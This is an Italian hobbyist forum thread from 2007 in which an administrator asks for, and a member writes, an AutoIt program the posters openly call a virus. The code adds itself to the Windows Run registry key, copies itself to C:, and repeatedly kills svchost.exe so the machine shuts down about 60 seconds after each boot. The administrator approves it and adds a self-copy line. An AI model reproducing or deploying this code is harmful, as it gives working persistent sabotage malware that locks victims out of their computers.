certaindeath Admin


Numero di messaggi: 343 Data d'iscrizione: 30.07.07
 | Oggetto: Chiudere processi sensibili Ven Set 14, 2007 4:05 pm | |
| Quando premete CTRL-ALT-CANC e cliccate su "processi", vedete una lista interminabile con nomi che a volte riconoscete( che megari vi ricordano qualche programma che avete in esecuzione), e a volte non sapete nemmeno cosa siano. Tra questi non mancano i processi di windows(che sono sempre in esecuzione a patto che abbiate windows attivo sulla vostra macchina). Esistono alcuni di questi come "svchost" che se chiusi mandano in crisi il vostro S.O. e vi arriva un messaggio che vi dice che avete 60 secondi e poi il computer si spegnerà.
Chi mi fà un programma di autoit che si installa all'avvio e chiude il processo svchost? (di modo che appena accendete il computer avete 60 secondi e poi si spegne di nuovo?)
Premetto che questo virus non è infallibile... |
|
Ale4ever apprendista


Numero di messaggi: 33 Data d'iscrizione: 13.09.07
 | Oggetto: Re: Chiudere processi sensibili Ven Set 14, 2007 8:48 pm | |
| Io ho pensato a 2 soluzioni (anche se non sono sicuro che funzionino tutte e 2 o almeno una)... La prima è creare un programma unico così: | Codice: | RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "dkcd", "REG_SZ", "C:\Virus.exe")
While 1 = 1 If ProcessExists ("svchost.exe") Then ProcessClose ("svchost.exe") EndIf WEnd |
e chiamarlo "virus.exe" inserendolo in C: ; La seconda soluzione invece è creare 2 programmi distinti di cui il primo sarebbe:
| Codice: | RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "dkcd", "REG_SZ", "C:\Virus.exe") |
Mentre il secondo (cioè virus) sarebbe:
| Codice: | While 1 = 1 If ProcessExists ("svchost.exe") Then ProcessClose ("svchost.exe") EndIf WEnd |
Spero di essermi spiegato e soprattutto che sia giusto...
Ciauz! |
|
certaindeath Admin


Numero di messaggi: 343 Data d'iscrizione: 30.07.07
 | Oggetto: Re: Chiudere processi sensibili Lun Set 17, 2007 2:28 pm | |
| Ok !! Perfetto, come unica cosa ti posso dire di inserire questa stringa nel tuo programma: | Codice: | FileCopy( @scriptdir & "\Virus.exe", "C:\" )
|
questo ti eviterebbe la "fatica" di copiare il virus in C: |
|